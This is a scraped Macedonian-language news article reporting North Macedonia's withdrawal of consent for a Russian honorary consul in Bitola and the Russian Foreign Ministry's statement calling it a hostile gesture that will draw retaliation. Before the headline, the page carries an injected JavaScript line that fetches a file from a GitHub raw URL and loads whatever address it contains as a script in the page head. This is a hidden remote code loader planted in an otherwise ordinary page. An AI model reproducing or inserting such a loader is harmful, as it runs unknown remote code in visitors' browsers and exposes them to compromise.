;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Во Битола ќе нема руски почесен конзул - руското МНР одговори: Ова е политички мотивиран непријателски гест и провоцира наша возвратна реакција која секако ќе следи - Антропол
АктуелноЛокално

Во Битола ќе нема руски почесен конзул – руското МНР одговори: Ова е политички мотивиран непријателски гест и провоцира наша возвратна реакција која секако ќе следи

Министерството за надворешни работи на Русија соопшти дека Македонија ја информирала за повлекувањето на согласноста за воспоставување на функцијата почесен конзул на Русија во Битола.

Коментар на заменик-директорот на Департманот за информации и печат на МНР на Русија, Иван Нечаев во врска со почесниот конзул на Русија во Битола.

Властите на Северна Македонија официјално известија за повлекување на согласноста за именување на почесен конзул на Руската Федерација во градот Битола. Ништо не се кажува за мотивите за овој чекор – очигледно, тие не можеа да бидат формулирани поради нивното јасно отсуство.

Во изјавата од руското МНР се наведува дека ова е политички мотивиран и непријателски гест на Република Македонија кон Русија.

Не постои сомнеж дека ова е повторно политички мотивиран, непријателски гест. Повторниот напад против нас има за цел да го продлабочи јазот во руско-македонските односи коj настана поради зависното однесување на Северна Македонија, да ја покаже слепата лојалност на оваа балканска земја кон западните сојузници, нивната политика на санкции и грубиот притисок врз Русија.

На крајот од соопштението на руското МНР, тие изразуваат жалење за овој однос на Република Македонија, бидејќи со овој потег се жртвува поддршката и соработката која се развива преку конзуларното претставништво во Битола, но и истакнуваат дека ќе следи соодвена возвратна реакција од Русија.

Жално е што овојпат во Скопје поради антирускиот курс се жртвува институцијата почесни конзули кои помагаат во развивањето на меѓучовечките контакти, даваат поддршка на луѓето и на бизнисите. Според се, таму не се грижат многу за сопствените интереси и провоцираат наша возвратна реакција, која секако ќе следи.